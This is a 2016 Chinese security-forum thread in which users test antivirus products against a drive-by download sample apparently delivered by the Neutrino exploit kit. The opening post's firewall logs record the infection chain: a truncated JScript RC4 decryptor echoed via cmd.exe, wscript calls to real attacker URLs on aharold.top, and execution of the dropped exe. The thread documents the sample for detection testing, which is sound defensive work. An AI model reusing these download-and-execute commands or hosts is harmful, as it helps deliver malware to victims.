Detection ratio: 2 / 55 Exploit Toolkit 91 & Neutrino Exploit Kit 25 挂马

显示全部楼层 · 发表于 2016-2-27 21:08:36

SHA256: 9d1f19e228cecfb9464f71464690d774a4433d58fb82e159dd903a7963033dae
File name: rad0DC0E.tmp.exe
Detection ratio: 2 / 55
Analysis date: 2016-02-27 13:02:43 UTC ( 1 minute ago )
https://www.virustotal.com/en/file/9d1f19e228cecfb9464f71464690d774a4433d58fb82e159dd903a7963033dae/analysis/1456578163/

Qihoo-360 QVM07.1.Malware.Gen 20160227
Rising PE:Malware.XPACK-HIE/Heur!1.9C48 [F] 20160225

瑞星越来越……药店……不说了我是少先队员我不可以骂人

SSF拦截日志：

2016/2/27 20:57:12,C:\Program Files (x86)\Internet Explorer\iexplore.exe,53,Allowed ;执行应用程序 (cmd.exe /q /c cd /d "%tmp%" && echo function r(g,f){for(var c=0,k,b=[],e=[],a=0;256^>a;a++)b[a]=a;for(a=0;256^>a;a++)c=c+b[a]+f[v](a%f.length)^&255,k=b[a],b[a]=b[c],b[c]=k;for(var l=c=a=0;l^<g.length;l++)a=a+1^&255,c=c+b[a]^&255,k=b[a],b[a]=b[c],b[c]=k,e["\x7)

2016/2/27 20:57:22,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (wscript //B //E:JScript lket.tmp "snpbhmwxzn"
"http://bgnwa.aharold.top/1977/09/26/kitty/waistcoat/enough/peep-mile-decay-alive-splendid-drink-mock-pair-their-coal.html" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; .NET4.0E; .NET4.0C; Tablet PC 2)

2016/2/27 20:57:30,C:\Program Files (x86)\Internet Explorer\iexplore.exe,53,Allowed ;执行应用程序 (cmd.exe /q /c cd /d "%tmp%" && echo function r(g,f){for(var c=0,k,b=[],e=[],a=0;256^>a;a++)b[a]=a;for(a=0;256^>a;a++)c=c+b[a]+f[v](a%f.length)^&255,k=b[a],b[a]=b[c],b[c]=k;for(var l=c=a=0;l^<g.length;l++)a=a+1^&255,c=c+b[a]^&255,k=b[a],b[a]=b[c],b[c]=k,e["\x7)

2016/2/27 20:57:44,C:\Windows\SysWOW64\cmd.exe,53,Allowed ;执行应用程序 (wscript //B //E:JScript ynol.tmp "snpbhmwxzn" "http://bgnwa.aharold.top/channel/brandy-37228179" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; .NET4.0E; .NET4.0C; Tablet PC 2.0; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALI)

2016/2/27 20:57:58,C:\Windows\SysWOW64\wscript.exe,48,Allowed ;出站网络访问

2016/2/27 20:58:01,C:\Windows\SysWOW64\wscript.exe,50,Allowed ;使用 DNS 解析服务访问网络
2016/2/27 20:58:03,C:\Windows\SysWOW64\wscript.exe,48,Allowed ;出站网络访问

2016/2/27 20:58:30,C:\Windows\SysWOW64\wscript.exe,53,Allowed ;执行应用程序 ("C:\Windows\System32\cmd.exe" /c rad0DC0E.tmp.exe)

显示全部楼层 · 发表于 2016-2-27 21:13:28

HEU_AEGISCS941

显示全部楼层 · 发表于 2016-2-27 21:16:46

都发了一天，还看不到诺顿测试，谁懂我的伤悲，哎呀赶紧给我出一道5以内的加减法，看看脑袋有没有瑕疵

显示全部楼层 · 发表于 2016-2-27 21:24:07

本帖最后由 rrorr 于 2016-2-27 21:30 编辑

ns22miss，检测到大量可疑出站通信，问是否启动NPE

显示全部楼层 · 发表于 2016-2-27 21:25:56

墨家小子发表于 2016-2-27 21:16
都发了一天，还看不到诺顿测试，谁懂我的伤悲，哎呀赶紧给我出一道5以内的加减法，看看脑袋有没有瑕疵[:340 ...

GD 来了~~

这货不允许偶在沙箱里双击

显示全部楼层 · 发表于 2016-2-27 21:26:47

27.02.2016 21.26.33;Detected object (file) deleted.;C:\360安全浏览器下载\rad0DC0E.tmp\rad0DC0E.tmp.exe;C:\360安全浏览器下载\rad0DC0E.tmp\rad0DC0E.tmp.exe;UDS:DangerousPattern.Multi.Generic;Unknown threat;02/27/2016 21:26:33

显示全部楼层 · 发表于 2016-2-27 21:27:04

显示全部楼层 · 发表于 2016-2-27 21:31:41

rrorr 发表于 2016-2-27 21:24
ns22miss，检测到大量可疑出站通信，问是否启动NPE

你注销一下看看

显示全部楼层 · 发表于 2016-2-27 21:32:00

rrorr 发表于 2016-2-27 21:24
ns22miss，检测到大量可疑出站通信，问是否启动NPE

顺便看看启动项

显示全部楼层 · 发表于 2016-2-27 21:34:26

本帖最后由 rrorr 于 2016-2-27 21:48 编辑

墨家小子发表于 2016-2-27 21:31
你注销一下看看

我开NPE了，待会重新双击再注销
启动项这2个？
C:\Users\Administrator.PC\AppData\Local\tnkeyxv.dll
C:\Windows\system32\TPVMMon.dll

注销后再进没什么变化

[可疑文件] Detection ratio: 2 / 55 Exploit Toolkit 91 & Neutrino Exploit Kit 25 挂马

本帖子中包含更多资源

评分

本帖子中包含更多资源

浏览过的版块